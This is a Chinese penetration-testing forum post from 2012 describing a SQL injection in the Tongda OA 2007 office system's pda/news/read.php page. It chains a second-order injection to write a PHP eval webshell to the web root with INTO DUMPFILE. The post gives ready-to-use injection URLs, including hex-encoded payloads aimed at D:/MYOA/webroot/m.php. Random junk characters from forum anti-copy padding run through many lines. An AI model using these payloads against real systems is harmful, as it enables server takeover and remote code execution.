中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
, P0 w( k' x! c3 |) ?
9 B  m8 k6 L+ B- d
# d& p" ?+ N/ |4 E9 S% F% SOffice Anywhere 2007 网络智能办公系统
8 `) L: v( G" X+ i# F' E9 w( ~
: q8 E: ^3 N/ v1 ~2 `5 d; Fhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..9 C+ e& l4 u# W$ i! o7 q- L

% ~) u- {  T/ `5 N( Q% k5 `/ O& _4 A 3 X2 T6 p1 s0 N/ {4 v
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
! C! b/ U2 K5 }
$ o6 m) t& I9 t- W7 o) _例如:SELECT * from USER where USER_ID='{$USERNAME}'  ! Q# V! i( [# M2 U4 @" K( F
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
/ ~. i* C: Y1 N5 ~& m5 L  ~ * O3 E, z: b% ]6 T7 T7 S7 E
这个时候我们是不是可以组合起来使用哪?
9 w9 i% h, A; p6 h6 \ ( S1 t* n  h7 i$ o( t+ P7 G$ j
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
2 t( i6 H2 {5 p& d6 Lunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
# C1 G. j, K  {2 X' k; }9 V ' k; t7 D; j; f+ X; C. @+ O, @
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
5 m" b: Y1 a4 B% f ' J& \$ I% ^! m; F( H: c  b+ F
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。9 J/ z7 d; j6 H0 a" e( q1 p

: U& m, M# u- o( D7 R5 i那么我们用字符串格式带入进行hex编码/ c+ p8 Q! B1 Y' k8 f; r

9 D2 v; X/ K! H& D5 Z%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%230 D8 ?0 m) i$ D& v* G& Y. O# h

0 Z! o% I: ~. t+ u0 X1 @+ K测试ok,获取oa的webshell
3 `8 U3 r3 ~+ R 9 ^* A+ u+ l% `: J2 `; X5 O' C

: R* I, Y& n8 t& \7 E; g1 {* k# z" ipda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23+ G* X/ p1 d& Y3 ~
直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2